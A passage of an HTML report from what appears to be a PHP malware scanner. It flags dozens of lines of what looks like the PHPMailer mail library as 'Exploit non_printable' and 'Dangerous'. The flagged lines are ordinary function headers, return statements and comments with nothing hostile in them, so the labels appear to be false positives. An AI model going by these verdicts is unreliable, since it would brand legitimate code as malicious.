</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1619</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">$sendMethod</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1643</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1717</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isShellSafe</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1744</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions that access local file paths</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1749</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isPermittedPath</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1751</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'#^[a-z]+://#i'</span><span style="color: #007700">, </span><span style="color: #0000BB">$path</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1763</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1772</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header by the receiver</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1804</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to load your own SMTP implementation</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1805</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">SMTP</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1807</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSMTPInstance</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1812</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtp</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1817</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">there is a bad MAIL FROM</span><span style="color: #007700">, </span><span style="color: #0000BB">RCPT</span><span style="color: #007700">, or </span><span style="color: #0000BB">DATA input</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1827</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1883</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the operation failed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1890</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpConnect</span><span style="color: #007700">(</span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2012</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpClose</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2024</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">it cannot load the language file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2031</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setLanguage</span><span style="color: #007700">(</span><span style="color: #0000BB">$langcode </span><span style="color: #007700">= </span><span style="color: #DD0000">'en'</span><span style="color: #007700">, </span><span style="color: #0000BB">$lang_path </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2058</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #DD0000">',</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2091</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">$foundlang</span><span style="color: #007700">; </span><span style="color: #FF8000">// Returns false if language not found</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2098</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getTranslations</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2100</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2113</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrAppend</span><span style="color: #007700">(</span><span style="color: #0000BB">$type</span><span style="color: #007700">, </span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$type </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">', '</span><span style="color: #007700">, </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">) . </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2129</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrFormat</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2132</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2134</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">]), </span><span style="color: #DD0000">'phrase'</span><span style="color: #007700">) . </span><span style="color: #DD0000">' <' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wrapText</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$length</span><span style="color: #007700">, </span><span style="color: #0000BB">$qp_mode </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2238</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$message</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2248</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">integer</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2250</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">utf8CharBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$encodedText</span><span style="color: #007700">, </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2284</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2295</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setWordWrap</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled headers</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createHeader</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2414</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getMailMIME</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2462</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns the whole MIME message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2469</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSentMIMEMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2471</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailHeader</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n\r"</span><span style="color: #007700">) . </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2478</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">generateId</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2479</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">uniqid</span><span style="color: #007700">(</span><span style="color: #0000BB">time</span><span style="color: #007700">()));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2484</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns an </span><span style="color: #007700">empty </span><span style="color: #0000BB">string on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2487</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled message body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2489</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createBody</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2675</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned by openssl contains both headers </span><span style="color: #007700">and </span><span style="color: #0000BB">body</span><span style="color: #007700">, </span><span style="color: #0000BB">so need to split them up</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2691</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2695</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the start of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2703</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">, </span><span style="color: #0000BB">$charSet</span><span style="color: #007700">, </span><span style="color: #0000BB">$contentType</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2728</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the end of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2733</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">endBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2735</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$boundary </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2744</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setMessageType</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2770</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">headerLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2772</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
